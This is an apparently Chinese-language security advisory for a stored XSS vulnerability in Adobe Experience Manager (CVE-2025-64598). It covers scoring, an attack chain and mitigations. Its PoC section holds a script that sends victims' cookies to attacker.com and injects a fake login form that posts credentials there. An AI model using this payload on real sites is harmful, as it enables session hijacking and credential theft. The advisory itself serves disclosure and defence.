Adobe Experience Manager 存储型XSS漏洞 (CVE-2025-64598)

漏洞信息

漏洞编号

CVE-2025-64598

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64598是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响6.5.23及更早版本，CVSS评分为5.4（中危）。攻击者可以利用低权限账户在存在漏洞的表单字段中注入恶意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端，当其他用户浏览包含该漏洞字段的页面时，恶意代码会在受害者浏览器中执行，可能导致敏感信息窃取、会话劫持或其他恶意操作。此漏洞需要用户交互才能触发，攻击复杂度较低，但成功利用会对应用程序的完整性和机密性造成一定影响。Adobe安全团队([email protected])已确认此漏洞并发布安全公告 APSB25-115。

技术细节

Adobe Experience Manager 6.5.23及更早版本在处理用户输入的表单字段时缺乏充分的输入验证和输出编码。攻击者（拥有低权限账户）可以在表单输入中注入恶意JavaScript代码，如：<script>alert(document.cookie)</script>或更复杂的窃取会话令牌的脚本。该恶意代码被存储在系统数据库中，当其他用户访问包含该字段的页面时，服务器将未经过滤的数据直接返回给客户端浏览器。浏览器将恶意脚本作为页面内容的一部分执行，从而实现XSS攻击。由于是存储型XSS，攻击只需一次注入即可影响所有访问该页面的用户。此漏洞的CVSS向量显示攻击向量为网络(AV:N)，攻击复杂度低(AC:L)，但需要低权限(PR:L)和用户交互(UI:R)。

攻击链分析

STEP 1

信息收集

攻击者识别目标Adobe Experience Manager实例版本，确认版本 <= 6.5.23

STEP 2

账户获取

攻击者获取低权限账户（如普通用户或内容贡献者账户）

STEP 3

恶意脚本注入

在存在漏洞的表单字段中注入存储型XSS payload，如<script>标签或事件处理器

STEP 4

数据持久化

恶意脚本被保存到服务器数据库中，成为页面内容的一部分

STEP 5

受害者访问

目标用户（管理员或其他用户）访问包含恶意脚本的页面

STEP 6

脚本执行

用户浏览器解析页面时执行注入的恶意JavaScript代码

STEP 7

数据窃取/会话劫持

恶意脚本窃取用户cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-64598 -->
<!-- Login to Adobe Experience Manager with low-privilege account -->
<!-- Inject malicious script into vulnerable form field -->

<!-- Step 1: Create or edit a form field -->
<script>
  // Steal session cookies
  var stolenData = document.cookie;
  
  // Send stolen data to attacker-controlled server
  fetch('https://attacker.com/steal?data=' + encodeURIComponent(stolenData));
  
  // Alternative: Display fake login form
  var fakeForm = '<div style="position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:20px;border:1px solid red;"><h2>Session Expired</h2><form action="https://attacker.com/phish"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button type="submit">Login</button></form></div>';
  document.body.innerHTML += fakeForm;
</script>

<!-- Step 2: When victim visits the page containing the field, script executes automatically -->
<!-- The malicious script runs in victim's browser context -->

影响范围

Adobe Experience Manager <= 6.5.23

防御指南

临时缓解措施

立即将Adobe Experience Manager升级到官方安全更新版本。临时缓解措施包括：1) 限制低权限用户对表单字段的编辑权限；2) 实施严格的输入过滤策略，过滤<script>、<img>、<svg>等可能执行脚本的标签；3) 启用Content Security Policy (CSP)限制内联脚本执行；4) 对所有输出内容进行HTML实体编码转义特殊字符；5) 监控和审计表单提交日志，及时发现异常注入行为。